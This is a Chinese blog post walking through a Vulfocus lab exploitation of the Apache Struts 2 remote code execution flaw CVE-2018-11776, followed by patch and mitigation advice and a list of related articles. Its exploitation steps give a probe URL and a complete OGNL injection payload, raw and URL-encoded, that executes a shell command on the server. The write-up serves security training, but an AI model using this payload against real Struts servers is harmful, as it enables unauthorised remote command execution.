[Vulfocus解题系列]Struts 2 远程代码执行漏洞(CVE-2018-11776)

最新推荐文章于 2024-04-23 16:50:52 发布
最新推荐文章于 2024-04-23 16:50:52 发布
阅读量1k 收藏 4
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/118491915
版权

漏洞介绍

名称: struts2 代码执行 (CVE-2018-11776)

描述: Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 action元素没有设置名称空间属性,或者使用了通配符名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞

影响版本

Struts <= Struts 2.3.34, Struts 2.5.16

解题过程

1.访问靶机地址 http://靶机IP/struts2-showcase/
在这里插入图片描述
2.构造如下参数的访问URL

http://靶机IP/struts2-showcase/$%7B233*233%7D/actionChain1.action

3.利用BurpSuite抓包并改包,Go得到下图所示结果,说明存在漏洞。可以看到,233X233的结果已经在Location头中返回。
在这里插入图片描述
4.构造POC,替换掉请求内容
原始poc:

${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request[‘struts.valueStack’].context).(#cr=#ct[‘com.opensymphony.xwork2.ActionContext.container’]).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec(‘ls /tmp’)).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

url编码后的poc:

/struts2-showcase/$%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B’struts.valueStack’%5D.context).(%23cr%3D%23ct%5B’com.opensymphony.xwork2.ActionContext.container’%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec(‘ls%20/tmp’)).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action

使用构造好的poc,获得flag
在这里插入图片描述

漏洞原理

Struts2的漏洞利用条件如下:

   - alwaysSelectFullNamespace值为true
   - action元素未设置namespace属性,或使用了通配符

    namespace将由用户从uri传入,并作为OGNL表达式计算,最终造成任意命令执行漏洞

修复方案

1.建议用户及时下载最新版本(2.3.35或2.5.17版本)。下载地址:

http://archive.apache.org/dist/struts/

2.临时解决办法:当上层动作配置中没有设置或使用通配符namespace时,验证所有XML配置中的namespace,同时在JSP中验证所有url标签的value和action。

00勇士王子
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
struts2 代码执行CVE-2018-11776)
qq_32445755的博客
03-08 801
影响版本 Struts<= Struts 2.3.34, Struts 2.5.16 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 action元素没有设置名称空间属性,或者使用了通配符名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。路径为/struts2-showcase/ ...
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057(CVE-2018-11776)
qq_51577576的博客
12-10 545
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057(CVE-2018-11776) 漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。
struts2 代码执行CVE-2018-11776)漏洞复现 vulfocus夺旗
muhan的博客
04-15 4418
1、启动环境:直接vulfocus搜索cve编号启动,并访问环境ip地址 2、判断是否有漏洞: 使用特定payload拼接url,访问抓包 ip地址/struts2-showcase/$%7B233*233%7D/actionChain1.action 利用BurpSuite抓包并改包,Go得到下图所示结果,说明存在漏洞。可以看到,233X233的结果已经在Location头中返回 3、构造POC,替换掉请求内容 原始poc: ${(#dm=@ognl.OgnlContext@DEFAULT
vulfocus靶场struts2 命令执行 CVE-2016-3081
最新发布
没有故事
04-23 394
后面接payload。Struts 2服务器上执行任意代码,取得网站服务器控制权。payload: 红色部分为可替换的执行命令。远程攻击者利用漏洞可。
linux struts2漏洞,Struts 2 远程代码执行漏洞CVE-2018-11776)
weixin_33603656的博客
05-16 146
Struts 2 远程代码执行漏洞(CVE-2018-11776)发布日期:2018-08-22更新日期:2018-08-28受影响系统:Apache Group Struts2 2.5.0 - 2.5.16Apache Group Struts2 2.3.0 - 2.3.34描述:BUGTRAQ ID: 105125CVE(CAN) ID: CVE-2018-11776Apache Strut...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
远程执行代码漏洞(CVE-2018-0886)漏洞修复
08-21
CVE-2018-0886 CVE-2018-0886 Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886) windows安全漏洞修复,亲测有效
exploit_laravel_cve-2018-15133:利用 API_KEY 利用 Laravel 远程代码执行 (CVE-2018-15133)
05-31
来自 CVE 的描述: 在 Laravel Framework 到 5.5.40 和 5.6.x 到 5.6.29 中,远程代码执行可能由于对潜在不可信 X-XSRF-TOKEN 值的反序列化调用而发生。 这涉及到 Illuminate/Encryption/Encrypter.php 中的解密...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级openssh到OpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
Struts2 S2-057远程执行代码漏洞CVE-2018-11776)
江小白
07-20 496
受影响的版本:<= Struts 2.3.34,Struts 2.5.16 访问http://192.168.18.151:8080/showcase/, 利用 S2-057需要以下条件: alwaysSelectFullNamespace是真的 action元素没有设置namespace属性,或者使用了通配符 命名空间将由用户从uri传递并解析为OG...
vulfocus漏洞复现】Laravel Debug mode RCE(CVE-2021-3129)复现
一剑开天门!的博客
02-26 2790
vulfocus漏洞复现】Laravel Debug mode RCE(CVE-2021-3129)复现(由于本人现在还比较菜,勿喷!)
V8引擎的CVE-2018-17463漏洞复现
m0_63437215的博客
05-27 262
V8引擎的CVE-2018-17463漏洞复现
xray扫描器的使用 (长亭科技公司创造)
yyj1781572的博客
11-27 8636
xray扫描器的使用 xray是一款可以使用HTTP/HTTPS代理进行被动扫描的安全工具
CMS系列远程代码执行—Discuz
WEB渗透测试 从入门到萌新
10-06 1173
测试漏洞,随便点击一个页面,抓包,将Cookie中的xxx_language参数值改为’.phpinfo().’,发现成功执行代码 存在命令执行漏洞
框架/组件漏洞系列1:struts2漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-03 9407
前言: 本篇文章中复现的漏洞不是特别全面,但是挑选了最近两年的漏洞进行复现,旨在对漏洞进行有用复现,毕竟一些老漏洞已经基本不存在了。 一、Struts简介 1、简介 基本介绍: Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://.
Spring Web Flow 远程代码执行漏洞分析
weixin_67271870的博客
11-23 536
漏洞在2017年5月31号被提交到平台,官方并没有详细的信息,通过官方描述和补丁的对比,我们可以大致推断应该是Spring WebFlow在Model的数据绑定上面,由于没有明确指定相关model的具体属性导致从表单可以提交恶意的表达式从而被执行,导致任意代码执行漏洞,这个漏洞利用除了版本的限制之外还有两个前置条件,这两个前置条件中有一个是默认配置,另外一个就是编码规范了,漏洞能不能利用成功主要就取决于后面的条件。
Vulfocus靶场漏洞复现系列—1
tlovejr的博客
03-02 5737
文章目录 前言 一、pandas是什么? 二、使用步骤 总结 前言 接下来会给大家介绍一些最常见的复现漏洞过程,我所用的是Vulfocus靶场,靶场安装方法已经在上一篇文章讲过,大家可以自行去观看。如果大家想及时获取最新漏洞消息,大家可以直接cnvdhttps://www.cnvd.org.cn/去查看即可,小白入门,如果在博客中有什么错误,还请各位大佬指出。 一、Drupal远程代码执行漏(CVE-2019-6340) 1、漏洞介绍 Drupal官方之前更新了一个非常关键的安全补丁,
CVE-2018-1288
04-16
CVE-2018-1288是一个安全漏洞,它影响了Apache Struts 2框架。该漏洞允许攻击者通过构造特定的HTTP请求来执行任意代码或进行远程命令执行。攻击者可以利用这个漏洞来获取系统权限,进而对受影响的应用程序进行未授权的操作。 为了修复这个漏洞,Apache Struts 2发布了相应的安全补丁。如果您正在使用Apache Struts 2框架,请确保及时更新到最新版本以防止受到该漏洞的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值